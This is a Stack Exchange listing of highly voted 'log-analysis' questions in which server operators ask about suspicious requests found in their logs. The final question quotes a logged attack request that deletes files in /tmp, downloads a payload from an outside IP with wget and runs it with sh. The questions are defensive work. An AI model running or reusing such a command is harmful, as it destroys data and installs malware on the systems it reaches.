Highest Voted 'log-analysis' Questions - IT Security Stack Exchange

36

votes

2 answers

How to prevent users from executing commands through browser URL?

I have very little experience with security (still learning) however was combing through my logs and I noticed the following request: "GET…

http log-analysis

asked Feb 28 '19 at 08:15

user3718908

423
4
6

25

votes

1 answer

Why am I receiving HTTP GETs for a domain I don't own?

I am running a Centos7 web server. I noticed a few strange HTTP GET requests like these: 94.185.83.100 - - [29/Feb/2016:23:29:00 +0530] "GET http://testp1.piwo.pila.pl/testproxy.php HTTP/1.1" 404 390 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0)…

http apache dns-domain log-analysis

asked Mar 04 '16 at 11:27

Sriram

373
3
6

14

votes

1 answer

How can I practice log file analysis?

There are a lot of excellent resources to sharpen your pentesting skills (like Hackthebox, Vulnhub, Juiceshop, Burp Suite Academy and so on), but I couldn't find something similar for forensics, especially log file analysis. I thought about setting…

professional-education log-analysis

asked Jun 17 '21 at 06:43

Opera of the Phantom

185
9

13

votes

2 answers

Weird Log Record from researchscan1.eecs.berkeley.edu (169.229.3.91) - is this a hack attempt?

I was looking through my ufw log record when I found this line: 169.229.3.91 - - [19/Feb/2016:13:21:52 +0100] "\xCEA\x81\xCF\x02\x03\xFCAm\xB8\xBF]1\xBE~0^\xCD\xA9\x05(\x8D`\xD9\x9D\x9D\x9C\x15m" 400 166 "-" "-" Is this a hack attempt?

log-analysis

asked Feb 19 '16 at 16:01

William Briot

133
6

9

votes

1 answer

Which ssh exploit works by changing the user name in the middle of the process?

Every few hours, I get a few of those in my server logs: sshd[...]: Disconnecting: Change of username or service not allowed: (httpd,ssh-connection) -> (http,ssh-connection) [preauth] sshd[...]: Disconnecting: Change of username or service not…

ssh known-vulnerabilities openssh log-analysis

asked Apr 23 '16 at 13:20

Heinzi

2,914
2
21
25

6

votes

1 answer

Looking for resources for interpreting my security logs

I am currently setting up an Apache web server on a Linux machine at my house. I am working on a website project which will allow users to log in to complete certain work. There is no open registration on this website. Accounts must be issued by…

logging log-analysis

asked Apr 10 '18 at 21:07

Jim Baize

83
6

5

votes

0 answers

http request: your killing me smalls

I was looking through my Apache Status in WHM and noticed this odd line in the log: POST /your/killing/me/smalls.jpg HTTP/1.1 It is mostly from 54.86.11.108 but I have seen at least one other IP. I've tried to search this, but only turn up a movie…

http logging log-analysis

asked Dec 14 '16 at 01:58

RozzA

201
1
8

5

votes

2 answers

How can I read snort logs in NIDS mode?

I am reading some snort logs from a firewall, I could read some with "snort -r file" But when I had tried the newest logs I get this error: snort -r snort.log Running in packet dump mode --== Initializing Snort ==-- Initializing Output…

snort log-analysis

asked Sep 05 '16 at 15:33

bugsam

61
1
1
5

4

votes

2 answers

Log of all processes running on a computer

I'm new to the security domain and I want to ask - Does every program leave an 'imprint' in a log of some kind, in a laptop or a PC - of whatever process it ran. If yes, can they be analysed?

logging antimalware log-analysis

asked Sep 03 '15 at 22:21

Prathiba

73
5

4

votes

0 answers

Obtaining large data sets for research: MySQL, PHP, Apache, etc

I have been looking around the web for large data sets (specifically web related log files - MySQL, PHP, Apache, and so on) that contains data of attempted intrusions/exploits. I am doing some research on threat intelligence and I'd like to analyze…

php sql-injection apache mysql log-analysis

asked Jul 22 '15 at 15:34

user0000001

141
2

4

votes

1 answer

What vulnerability might this invalid HTTP_HOST value be trying to exploit?

I just received an error email from my home web-server (It's a low traffic site, and since it's running a Django application I've written myself getting an email on errors helps me find bugs). Subject: [Django] ERROR (EXTERNAL IP): Invalid HTTP_HOST…

http vulnerability log-analysis

asked Dec 09 '16 at 06:54

Adam Luchjenbroers

143
5

4

votes

2 answers

The UK Terror Watchdog says this is very difficult in practise, is it?

I saw this quote today in the Guardian David Anderson QC, the terror legislation watchdog commissioned to report on the state of Britain’s surveillance laws in the aftermath of Snowden’s disclosures, has previously said that internet…

forensics log-analysis

asked Nov 04 '15 at 04:45

ian

1,302
11
21

3

votes

1 answer

How to detect changing IP address and user agent on a HTTP session?

I have some HTTP logs where I see the hacker changing his IP every request, and occasionally changing his useragent. Is there a way to detect this automatically? Perhaps a snort rule? or any other way?

http snort log-analysis

asked May 29 '15 at 14:27

user77568

41
3

3

votes

2 answers

Regular Expressions for common exploits

I patched for shellshock and was barraged a few days later. However, I would not have known any attempts were made at all if not for a regular expression I found on the internet. This has inspired me to look further into my logs. Is there any…

webserver logging attack-vector log-analysis

asked Nov 10 '14 at 05:14

Dylan Katz

243
1
3
9

3

votes

1 answer

Why request shell commands from nginx?

I was playing around with nginx and noticed that within 1-2 hours of putting it online, I got entries like this in my logs: 170.81.46.70 - - "GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.14.224.220/jaws;sh+/tmp/jaws HTTP/1.1" 301 169 "-" "Hello,…

nginx log-analysis

asked Jul 09 '20 at 03:50

Artimithe55

209
1
7

Questions tagged [log-analysis]